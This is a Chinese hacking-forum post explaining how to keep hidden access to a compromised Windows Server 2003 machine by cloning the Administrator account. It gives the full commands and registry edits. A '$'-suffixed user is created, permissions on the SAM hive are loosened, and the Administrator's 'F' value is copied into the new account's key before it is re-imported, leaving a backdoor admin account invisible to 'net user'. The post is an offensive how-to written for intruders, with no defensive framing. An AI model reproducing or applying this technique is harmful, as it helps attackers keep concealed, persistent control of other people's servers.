[Server 2003] Win2003服务器下的账号克隆

今 无聊的时候和 偶们 CN群的 兄弟们检测站点的时候 又拣到一个03的鸡
现在win2003的服务器真多 我最近基本见到的web站点全是 2003系统的
对以前 在 2000下 那些克隆的方法来说 用在03上会经常不奏效.
下面就参考以前焦点的 一个文章 加上自己的克隆心得 送给大家. 以下方法对
2003 100%有效!!

当登陆进3389以后--

先建立 cnlnfjhh$ 用户
c:\\>net user cnlnfjhh$ wrsky /add
//后面加$ 是为了使在 控制台下用 net user 看不到.

然后运行regedt32.exe(注意不是regedit.exe)
先找到HKEY_LOCAL_MAICHINE\\SAM\\SAM 点击它 ,然后在菜单\"安全\"->\"权限\" 添加自己现在登录的帐户或组,

把\"权限\"->\"完全控制\"->\"允许\"打上勾,然后确定.
这样就可以直接读取本地sam的信息

现在运行regedit.exe
打开键 HKEY_LOCAL_MAICHINE\\SAM\\SAM\\Domains\\account\\user\\names\\cnlnfjhh$
查看默认键值为\"0x3f1\" 相应导出如下
HKEY_LOCAL_MAICHINE\\SAM\\SAM\\Domains\\account\\user\\names\\cnlnfjhh$ 为cnlnfjhh$.reg
HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\000003F1 为 3f1.reg
HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\000001F4 为 lf4.reg (Administrators的相应键)
用记事本打开lf4.reg 找到如下的\"F\"的值,比如这个例子中如下

\"F\"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\\
00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\\
f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\\
00,00,00,00,00,00,00

把其复制后,打开3f1.reg,找到\"F\"的值,将其删除,然后把上面的那段粘贴.
打开cnlnfjhh$.reg,把里面的内容,比如这个例子中如下面这段复制

[HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Names\\cnlnfjhh$]
@=hex(3f1):

回到3f1.reg 粘贴上面这段到文件最后,最后生成的文件内容如下
Windows Registry Editor Version 5.00


QUOTE:

[HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\000003F1]
\"F\"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\\
00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\\
f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\\
00,00,00,00,00,00,00
\"V\"=hex:00,00,00,00,d4,00,00,00,02,00,01,00,d4,00,00,00,1a,00,00,00,00,00,00,\\
00,f0,00,00,00,10,00,00,00,00,00,00,00,00,01,00,00,12,00,00,00,00,00,00,00,\\
14,01,00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,\\
01,00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,01,\\
00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,01,00,\\
00,00,00,00,00,00,00,00,00,14,01,00,00,15,00,00,00,a8,00,00,00,2c,01,00,00,\\
08,00,00,00,01,00,00,00,34,01,00,00,14,00,00,00,00,00,00,00,48,01,00,00,14,\\
00,00,00,00,00,00,00,5c,01,00,00,04,00,00,00,00,00,00,00,60,01,00,00,04,00,\\
00,00,00,00,00,00,01,00,14,80,b4,00,00,00,c4,00,00,00,14,00,00,00,44,00,00,\\
00,02,00,30,00,02,00,00,00,02,c0,14,00,44,00,05,01,01,01,00,00,00,00,00,01,\\
00,00,00,00,02,c0,14,00,ff,07,0f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,\\
00,70,00,04,00,00,00,00,00,14,00,1b,03,02,00,01,01,00,00,00,00,00,01,00,00,\\
00,00,00,00,18,00,ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,\\
00,00,00,18,00,ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,24,02,00,00,\\
00,00,24,00,04,00,02,00,01,05,00,00,00,00,00,05,15,00,00,00,b4,b7,cd,22,dd,\\
e8,e4,1c,be,04,3e,32,e8,03,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,\\
00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,48,00,65,00,6c,00,70,\\
00,41,00,73,00,73,00,69,00,73,00,74,00,61,00,6e,00,74,00,00,00,dc,8f,0b,7a,\\
4c,68,62,97,a9,52,4b,62,10,5e,37,62,d0,63,9b,4f,dc,8f,0b,7a,4f,53,a9,52,84,\\
76,10,5e,37,62,01,00,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,\\
ff,ff,ff,88,d7,f1,01,02,00,00,07,00,00,00,01,00,01,00,db,57,a2,94,f8,41,63,\\
fa,2c,88,d7,f1,cd,99,cf,0d,01,00,01,00,a0,05,70,54,f3,45,3e,4a,64,95,ef,6c,\\
37,f1,02,cf,01,00,01,00,01,00,01,00



[HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Names\\cnlnfjhh$]
@=hex(3f1):

保存后,将cnlnfjhh$用户删除 [在导入数据库之前 一定要先删除这个新加的帐号]c:\\>net user cnlnfjhh$ /delete
运行regedit.exe 将我们已经修改好的3f1.reg文件导入.
最后,打开regedt32.exe 找到HKEY_LOCAL_MAICHINE\\SAM\\SAM 点击它 ,然后在菜单\"安全\"->\"权限\" 删除刚才添加的帐号

然后 注销当前用户 用 cnlnfjhh$ /wrsky 登陆 就会是 最高权限了.

03克隆的方法和 2000的克隆 略有点区别 就是我文章的那前一部分.

这样就建立了一个在控制台用 net user 和\"计算机管理\"中都看不到的帐户cnlnfjhh$, 记着第一次就把密码设置好,不要改密码.负责会失效.